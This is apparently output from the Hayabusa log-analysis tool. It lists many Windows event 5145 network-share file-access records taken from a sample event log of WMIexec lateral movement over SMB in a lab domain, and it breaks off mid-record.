10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Contacts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Downloads\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Favorites\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Links\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Music\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Pictures\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Saved Games\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Searches\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Videos\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 